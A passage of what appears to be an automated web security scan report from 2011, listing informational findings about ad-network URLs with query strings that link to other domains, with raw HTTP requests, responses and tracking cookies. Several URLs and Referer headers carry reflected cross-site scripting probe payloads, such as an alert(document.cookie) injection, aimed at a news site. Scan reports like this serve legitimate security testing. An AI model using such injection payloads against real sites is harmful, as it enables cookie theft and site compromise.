http://ad.yieldmanager.com/iframe3?bCIAAN51GAAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAADC6pSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB5AEkioAYJCuvPVQB26IvqjDNR9aQy4Tagx25WAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D1190,Z%3D1x1%26s%3D1603038%26_salt%3D1973615950%26B%3D12%26m%3D2%26u%3Dhttp%253A%252F%252Fd3.zedo.com%252Fjsc%252Fd3%252Fff2.html%253Fn%253D933%253Bc%253D56%253Bs%253D1%253Bd%253D15%253Bw%253D1%253Bh%253D1%253Bq%253D1190%26r%3D0,cb1c926a-759b-11e0-9306-78e7d1f5c98c

The response contains the following link to another domain:

http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1585&s=1&l=1&t=e&e=1

Request

Response

19.3. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/imp?Z=300x250&s=748066&r=1&_salt=1834002789&u=http%3A%2F%2Fwww.maysville-online.com%2Ffavicon.ico%3Fbe4e4%2522-alert%281%29-%2522ccebc516c28%3D1

The response contains the following link to another domain:

http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Request

Response

19.4. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The page was loaded from a URL containing a query string:

http://ads.bluelithium.com/st?ad_type=iframe&ad_size=1x1&section=1603038

The response contains the following link to another domain:

http://content.yieldmanager.com/ak/q.gif

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:18 GMT
Pragma: no-cache
Content-Length: 4542
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

19.5. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1291165C12620110502141348&flash=0&time=2|15:43|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3afc/3/0/%2a/y%3B240437614%3B0-0%3B0%3B42386742%3B4307-300/250%3B41995482/42013269/1%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.300%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.300%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D300%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D2/1/e4/0%3B%7Esscs%3D%3f$CTURL$&r=0.42175230519297324

The response contains the following link to another domain:

http://ad.doubleclick.net/click;h=v8/3afc/3/0/*/y;240437614;0-0;0;42386742;4307-300/250;41995482/42013269/1;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;~okv=;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1476589&c=1&i=61A20400-D900-4F62-1309-A490016C0100&clickurl=http://www.uscellular.com/switch

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 15:43:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1960
Set-Cookie:PRID=C5584CF0-8B69-4387-BD9F-A54A34698515; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EomEA2WJP;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJpJEomEA2WJP!FsBAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=61A20400-D900-4F62-1309-A490016C0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZtP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMHx:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZtPGMHx:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ad.doubleclick.net/click;h=v8/3afc/3/0/*/y;240437614;0-0;0;42386742;4307-300/250;41995482/42013269/1;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;~okv=;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;~aopt=2/1/e4/0;~sscs=?http://clk.pointroll.com/bc/?a=1476589&c=1&i=61A20400-D900-4F62-1309-A490016C0100&clickurl=http://www.uscellular.com/switch'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/865250/USC_upgrades_chris_300x250.gif?PRAd=1476589&PRCID=14765
...[SNIP]...

19.6. http://ads.specificmedia.com/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.specificmedia.com
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

The response contains the following link to another domain:

http://servedby.flashtalking.com/imp/3/15881;124094;205;gif;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?

Request

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:12 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5013.3585181213909565146; domain=.specificmedia.com; path=/; expires=Wed, 06-Apr-2016 15:42:12 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Content-Length: 1926
Expires: Mon, 02 May 2011 15:42:12 GMT
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<a href="http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114212;dct=http://servedby.flashtalking.com/click/3/15881;124094;0;209;0/?url=349098" target="_blank">
<img border="0" src="http://servedby.flashtalking.com/imp/3/15881;124094;205;gif;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?"></a>
...[SNIP]...

19.7. http://adserv.impactengine.com/www/2r/2o/qq/mo/objembed.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/2r/2o/qq/mo/objembed.html

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/2r/2o/qq/mo/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWRqYjI1NShnaWQkZmZhODU1YmUtNzU5Yi0xMWUwLWJiMTgtMjM4NjIyMWUxZDNlLHN0JDEzMDQ0MzczNjkwNzEyNDgsc2kkMzA5ODU1MSx2JDEuMCxhaWQkbG85Zm5HS0lWU2stLGN0JDI1LHlieCRvaU5iOVRQYjN0SDNXMWVGdVBxdnVnLHIkMCkp/0/*&cacheBuster=1304437369.107247

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/2r/2o/qq/mo/objembed.html?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWRqYjI1NShnaWQkZmZhODU1YmUtNzU5Yi0xMWUwLWJiMTgtMjM4NjIyMWUxZDNlLHN0JDEzMDQ0MzczNjkwNzEyNDgsc2kkMzA5ODU1MSx2JDEuMCxhaWQkbG85Zm5HS0lWU2stLGN0JDI1LHlieCRvaU5iOVRQYjN0SDNXMWVGdVBxdnVnLHIkMCkp/0/*&cacheBuster=1304437369.107247 HTTP/1.1
Host: adserv.impactengine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.0 200 OK
Date: Tue, 19 Apr 2011 23:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Mar 2011 20:35:31 GMT
Accept-Ranges: bytes
Content-Length: 7959
Content-Type: text/html; charset=UTF-8
Age: 49744
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 13bab584d800c2549ff4780f4d8538a635dad489c5ed52dbb8b09017468d6847d53b359ad14232c3,aa755dea954a4e7f7239f6261effe2cdf4ea9a6af0e78829dbd69f9f6f5e94a12e76aece97ee66ce
Via: 1.0 3385d16e8aeaf70ee27cd12b252c5d04.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

19.8. http://adserv.impactengine.com/www/5o/b6/6d/fj/objembed.html/@@1303756287@@ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/5o/b6/6d/fj/objembed.html/@@1303756287@@

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/5o/b6/6d/fj/objembed.html/@@1303756287@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWRvdWZncShnaWQkYWI4MmUyMzgtNzU5Yi0xMWUwLWI1YjEtMWZlNjBkZmJiNzVjLHN0JDEzMDQ0MzcyMjc4OTcwMzUsc2kkMzA5ODU1MSx2JDEuMCxhaWQkZlpmVnBXS0lWU3MtLGN0JDI1LHlieCRIcjcuTDAxR3BRRllrMkt2cWpEbTZBLHIkMCkp/0/*&cacheBuster=1304437227.942262

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/5o/b6/6d/fj/objembed.html/@@1303756287@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NWRvdWZncShnaWQkYWI4MmUyMzgtNzU5Yi0xMWUwLWI1YjEtMWZlNjBkZmJiNzVjLHN0JDEzMDQ0MzcyMjc4OTcwMzUsc2kkMzA5ODU1MSx2JDEuMCxhaWQkZlpmVnBXS0lWU3MtLGN0JDI1LHlieCRIcjcuTDAxR3BRRllrMkt2cWpEbTZBLHIkMCkp/0/*&cacheBuster=1304437227.942262 HTTP/1.1
Host: adserv.impactengine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 23:14:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 19:11:28 GMT
Accept-Ranges: bytes
Content-Length: 8582
Content-Type: text/html; charset=UTF-8
Age: 59154
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: bc2de465578a697f924f450fa50374d03df5e044910aee1f454561522f1ac896381f4c1c062c776f,bfedca1a97b35bbaf485565db708a326390df03e5a85ce365c39fb13c8b5972e95b49bb985a3f3a1
Via: 1.0 3271e339a6be51e6856e421ae66d02d8.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

19.9. http://adserv.impactengine.com/www/a5/zp/va/fr/objembed.html/@@1299531588@@ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/a5/zp/va/fr/objembed.html/@@1299531588@@

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/a5/zp/va/fr/objembed.html/@@1299531588@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTliMjdsaihnaWQkYmFjMzk1NGUtNzU5Yi0xMWUwLWE0ZmUtZWI5ODAwOGJhYTZmLHN0JDEzMDQ0MzcyNTM0ODY5MTksc2kkMzA5ODU1MSx2JDEuMCxhaWQkVHg1VmNXS0lWU0UtLGN0JDI1LHlieCQ5TGsxb29ObW1OV1NGbTRFTTF0Ym9RLHIkMCkp/0/*&cacheBuster=1304437253.529118

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/a5/zp/va/fr/objembed.html/@@1299531588@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NTliMjdsaihnaWQkYmFjMzk1NGUtNzU5Yi0xMWUwLWE0ZmUtZWI5ODAwOGJhYTZmLHN0JDEzMDQ0MzcyNTM0ODY5MTksc2kkMzA5ODU1MSx2JDEuMCxhaWQkVHg1VmNXS0lWU0UtLGN0JDI1LHlieCQ5TGsxb29ObW1OV1NGbTRFTTF0Ym9RLHIkMCkp/0/*&cacheBuster=1304437253.529118 HTTP/1.1
Host: adserv.impactengine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1

Response

HTTP/1.0 200 OK
Date: Thu, 17 Mar 2011 14:57:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Mar 2011 14:02:19 GMT
Accept-Ranges: bytes
Content-Length: 8173
Content-Type: text/html; charset=UTF-8
Age: 49940
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b8fb6e443eb5455876025fa1bb1f0d216275382fb0ec0307dade8a6b7e790f14e4394cdef66f9cdd,ab18374466f2cc532a4a6c63930f918aef85edea158ef9e005c75f9f9b06db2da05830677c433af7
Via: 1.0 3385d16e8aeaf70ee27cd12b252c5d04.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

19.10. http://adserv.impactengine.com/www/sz/7s/d2/pt/objembed.html/@@1299097540@@ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserv.impactengine.com
Path:	/www/sz/7s/d2/pt/objembed.html/@@1299097540@@

Issue detail

The page was loaded from a URL containing a query string:

http://adserv.impactengine.com/www/sz/7s/d2/pt/objembed.html/@@1299097540@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NThkcW5ubihnaWQkZGEzZDNiZjAtNzU5Yi0xMWUwLWFlMTQtODNmMWYwM2QyOTNmLHN0JDEzMDQ0MzczMDYyOTMzMDAsc2kkMzA5ODU1MSx2JDEuMCxhaWQkMURELnZrd05pWnMtLGN0JDI1LHlieCRvMEsyeWUuQTFBd3dndE1zWW83di5nLHIkMCkp/0/*&cacheBuster=1304437306.335113

The response contains the following link to another domain:

http://www.macromedia.com/go/getflash/

Request

GET /www/sz/7s/d2/pt/objembed.html/@@1299097540@@?trackingTag=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NThkcW5ubihnaWQkZGEzZDNiZjAtNzU5Yi0xMWUwLWFlMTQtODNmMWYwM2QyOTNmLHN0JDEzMDQ0MzczMDYyOTMzMDAsc2kkMzA5ODU1MSx2JDEuMCxhaWQkMURELnZrd05pWnMtLGN0JDI1LHlieCRvMEsyeWUuQTFBd3dndE1zWW83di5nLHIkMCkp/0/*&cacheBuster=1304437306.335113 HTTP/1.1
Host: adserv.impactengine.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 21:36:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Mar 2011 20:59:54 GMT
Accept-Ranges: bytes
Content-Length: 8232
Content-Type: text/html; charset=UTF-8
Age: 49818
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 70c25331f5798564f703ba514c5da3f2998ddf6c724806c66f96af6ef8097cd722a2987531de5a74,6beb2a075a2ff8236e5f537dbb77bc7be06a6644dfdf384d7e783ba3a07f427d1cb9893d4371484b
Via: 1.0 04c6b7d69b6a9aa32368bf8fd71029a0.cloudfront.net:11180 (CloudFront), 1.0 6d5d46d2c7dcee5d4601d83b29b92a90.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

<a href="http://www.macromedia.com/go/getflash/">Get Flash</a>
...[SNIP]...

19.11. http://as.casalemedia.com/j previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/j

Issue detail

The page was loaded from a URL containing a query string:

http://as.casalemedia.com/j?s=121910&u=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert(%2522DORK%2522)-%2522f8cf8d87874%3D1&a=4&id=54048766&p=0&v=2&inif=0&l=671&t=402&w=1920&h=1156&z=300&r=http%3A%2F%2Fburp%2Fshow%2F2&C=1

The response contains the following link to another domain:

http://cdn.optmd.com/blank.html

Request

Response

19.12. http://bh.contextweb.com/bh/drts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/drts

Issue detail

The page was loaded from a URL containing a query string:

http://bh.contextweb.com/bh/drts?Rand=1324671199

The response contains the following link to another domain:

http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7CRiC6i2pCL3Ub%7C

Request

GET /bh/drts?Rand=1324671199 HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: C2W4=CT-USR; cw=cw; V=RiC6i2pCL3Ub; FC1-WC=^54012_1_2R5ws; FC1-WCR=^108044_1_2R5ws; CDSActionTracking6=gDLdEnJ4dUI3|RiC6i2pCL3Ub|503597|2587|5273|54012|108044|94417|3|0|0|maysville-online.com|2|8|1|0|2|1|2||1|0|PEiOeaHGRLH4quYZj5mgESimscR103Gq|I|2QJ2U|31Blm; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Cache-Control: private, max-age=0, no-cache, no-store
Expires: -1
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 03 May 2011 15:41:29 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 155

<html>
   <body>
       <img src='http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7CRiC6i2pCL3Ub%7C' width='1' height='1'/>
   </body>
</html>

19.13. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=B765081F39B1F7

The response contains the following link to another domain:

http://cms.quantserve.com/dpixel?eid=0&id=CAESEBHuG4NIXIkDS6XoHpAqKz8&cver=1

Request

GET /pixel?nid=B765081F39B1F7 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Found
Location: http://cms.quantserve.com/dpixel?eid=0&id=CAESEBHuG4NIXIkDS6XoHpAqKz8&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 15:42:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 281
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://cms.quantserve.com/dpixel?eid=0&id=CAESEBHuG4NIXIkDS6XoHpAqKz8&cver=1">here</A>
...[SNIP]...

19.14. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESECjdIxEYcjZRgQqzDbqLYQo&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESECjdIxEYcjZRgQqzDbqLYQo&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Tue, 03 May 2011 15:41:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESECjdIxEYcjZRgQqzDbqLYQo&cver=1">here</A>
...[SNIP]...

19.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.49702017339170845

The response contains the following link to another domain:

http://a.collective-media.net/adj/cm.rev_lee/;sz=300x250;ord=' + Math.random() + '?

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.49702017339170845 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9:1190,2,9:933,56,15:826,276,9; FFad=4:0:1:0; FFChanCap=1583B1190,1#675962#675816#812963#816392,2#894866|0,1,1:0,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:dotconnect300x250,audiencescience300x250; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
